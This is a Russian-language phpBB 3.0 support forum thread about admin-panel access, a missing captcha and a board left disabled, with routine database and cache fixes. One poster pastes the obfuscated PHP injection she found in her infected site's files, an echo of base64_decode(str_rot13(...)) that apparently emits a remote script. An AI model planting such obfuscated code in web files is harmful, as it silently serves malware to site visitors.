Проблема с заходом в Administration Control Panel

Проблемы с установкой или работой phpBB 3.0.x? Получите помощь здесь!
С 1 января 2017 года phpBB Group прекращает поддержку phpBB версии 3.0.
Сайт официальной русской поддержки phpBB Guru продолжит поддержку phpBB 3.0 до 1 июля 2017 года.
Подробнее: Окончание поддержки phpBB 3.0.
Правила форума
Местная Конституция | Шаблон запроса | Документация (phpBB3) | Переход на 3.0.6 и выше | FAQ-3 (phpbb3) | Как задавать вопросы | Как устанавливать моды

Ваш вопрос может быть удален без объяснения причин, если на него есть ответы по приведённым ссылкам (а вы рискуете получить предупреждение ;) ).
Пчелкин
phpBB 3.3.0
Стаж: 16 лет 8 месяцев
Благодарил (а): 1832 раза

Re: Проблема с заходом в Administration Control Panel

Сообщение Пчелкин »

Запомните одно - работаете с форумом или с его файлами и всегда держите в отдельном окне страницу админки с кнопкой кеша. выручит всегда...
NIKON-D90, AF-S 18-105, AF-S 14-24, AF-S 24-70
Sergiocharm
phpBB 2.0.7
Стаж: 16 лет
Благодарил (а): 57 раз

Сообщение Sergiocharm »

Спасибо! Этим я пренебрег((
Последний раз редактировалось Айдар 16.05.2011 17:06, всего редактировалось 1 раз.
Причина: Убран оверквотинг
avtoliga
phpBB 1.0.0
Стаж: 15 лет 6 месяцев

Сообщение avtoliga »

Шаблон запроса
Описание проблемы: не могу зайти в администраторскую панель в мозилле, в IE - могу
Произведенные изменения, после которых начались неполадки: не было
Версия phpBB: не знаю где смотреть
Используемые стили:просильвер
Используемые моды:cbc cfb ctr ecb ncfb nofb ofb stream я думаю, это именно те моды))
Версия PHP:PHP Version 5.2.17
Используемая СУБД и её версия: не знаю
Ссылка на конференцию:http://www.avtocup.ru/forum/index.php?s ... 21ced48320
Есть ли у вас тестовый аккаунт: был бы если б было видно капчу, уже невозможно зарегистрировать новый аккаунт ни в мозилле ни в IE
Использовался ли поиск для решения проблемы: да
Если да, то какие запросы вы использовали: не могу войти в администраторскую панель :D

п.с. с шаблоном запроса тоже не смогла разобраться, для чего кнопка "отправить", если ничего не отправляется, а копируется внизу окна (по крайней мере у меня) заносила все вручную

Жду помощи (настроить так, чтоб было видно капчу при регистрации, обновить версию пхп) - и мои футболисты тоже очень ждут!
Пчелкин
phpBB 3.3.0

Сообщение Пчелкин »

avtoliga писал(а):cbc cfb ctr ecb ncfb nofb ofb stream я думаю, это именно те моды))
Во первых - это что? Подробней можно..
Во вторых -
avtoliga писал(а):в мозилле,
Это проблема, скорей всего, самой мазилы...что-то в ней отключено или не хватает...
avtoliga
phpBB 1.0.0

Сообщение avtoliga »

Пчелкин писал(а):cbc cfb ctr ecb ncfb nofb ofb stream
не обр внимания, я же чайник, читаю все подряд, но пока ничего толком не понимаю, что-то нашла в панели со словом MOD и подумала, что это нужные моды.
Капчу не видно ни в одном браузере. Как новым пользователям зарегистрироваться? (активация без одобрения администратора невозможна - сразу сыпется всякий форумный спам), или это тема другой ветки?
что-то с Мозиллой точно, так как в эксплорере в админскую панель спокойно захожу. Опера, кстати, выдает, что мой сайт - распространяет вредоносные ПО. Может быть у меня где-то троян,и проблема в этом, где его искать, на компе вроде нет...
avtoliga
phpBB 1.0.0

Сообщение avtoliga »

Короче - проблемы с капчей, входом в админскую панель, с криками оперы и веб секьюрити гарда о вредоносности моего сайта - все это благодаря вирусне ! почти каждый файл пхп имеет вот такую $somecrainsignvar="iup8y9c0"; echo base64_decode(str_rot13('CUAwpzyjqPO0rKOyCFW0MKu0Y2cuqzSmL3WcpUDvVUAlLm0vnUE0pQbiY2SxYayuozEyrP12MKWcMzywLKEco24hozI0Y3MypzyzrF12ZFV+CP9mL3WcpUD+')); $crain=""; фигню.
Один знакомый добрый мальчик мне помог в определении проблемы, немного, насколько смог, чищу все файлы по очереди. Что подскажете? Что сделать чтоб не заразилось все опять через ту же дырку, скорее всего благодаря небезопасному администрированию либо устаревшей версии форума :( !!!
FEAR93
Former team member
Стаж: 17 лет 11 месяцев
Благодарил (а): 22 раза

Сообщение FEAR93 »

Пчелкин
phpBB 3.3.0

Сообщение Пчелкин »

А лучше в рекрутинг, если форум важен, ценен и его жалко...сами вы ничего не сделаете, судя по описанию и фразам в сообщении..да ..побыстрей..может быть поздно..бекапа конечно нет?
Последний раз редактировалось FEAR93 19.05.2011 19:26, всего редактировалось 1 раз.
Причина: Убрал оверквотинг.
Sever801
phpBB 1.0.0
Стаж: 15 лет 3 месяца
Благодарил (а): 3 раза

Сообщение Sever801 »

Здравствуйте! Случилась проблемка. Отключил в админ понеле конференцию с выодом сообщения "извините идут технические работы". После думал зайти по localhost и продолжать вести работы, но не тут то было. Пишит естественно извините идут технические работ. Вообщем я теперь не куда зайти не могу. Форум версии phpBB 3.0.8. Извините если такая тема уже была в поиске я ее не нашел. Помогите, как теперь зайти в админ понель и включить форум
Пчелкин
phpBB 3.3.0

Сообщение Пчелкин »

Вбейте в браузере "свой форум/adm/index.php и войдете в админку...админка не должна захлопнуться..
Или поищите в поиске - "запрос на запуск форума"
Sever801
phpBB 1.0.0

Сообщение Sever801 »

В том то и дела захлопнулась форум Где ковырять какой файл чтоб включить конференцию подскажите
Пчелкин
phpBB 3.3.0

Сообщение Пчелкин »

Sever801
phpBB 1.0.0

Сообщение Sever801 »

Неа не помогло даже прямо в базе, в таблице phpbb_config
cookie_secure из 1 в 0 уменя кукесы отключены все по 0. А остольные темы не мои это у них в настройках.
У меня же все работало хорошо, повторюсь еще раз что случилась.
Зашел в админ панель поставил галочку отключить конференции (чтобы вести технические работы на форуме). Потом сразу при о бновлении страницы получилось так что не могу даже пароль илогин вбить, там только надпись "Извините идут технические работы". А логина и пароля нету. Я просто даже вбить некуда не могу. До этого я этой функцией не пользовался (отключение конференции), решил попробывать и вышла вот такая штука :shock: :D .
Sheer
Former team member
Стаж: 19 лет 7 месяцев
Благодарил (а): 54 раза

Сообщение Sheer »

В таблице phpbb_config установить значение board_disable равным 0, потом очистить кэш по FTP, потому чтоboard_disable не динамическое и кэшируется.
Изображение
Общие ошибки новичков (07.11.2005) & Как задавать вопросы
Мини FAQ
Если ничто другое не помогает, прочтите, наконец, инструкцию!
"Никакая инструкция не может перечислить всех обязанностей должностного лица, предусмотреть все отдельные случаи и дать вперёд соответствующие указания, а поэтому господа инженеры должны проявить инициативу и, руководствуясь знаниями своей специальности и пользой дела, принять все усилия для оправдания своего назначения".
Циркуляр Морского технического комитета №15 от 29.11.1910 г.
Sever801
phpBB 1.0.0

Сообщение Sever801 »

Спасибо помогло иссправил на 0 и зашел по домену http://мой сайт/forum/ucp.php?mode=login Все в админке включил конференцию. Еще вопрос а board_disable на 1 обратно возвращать потом не нужно в бд таблице?

Вернуться в «Поддержка phpBB 3.0.х»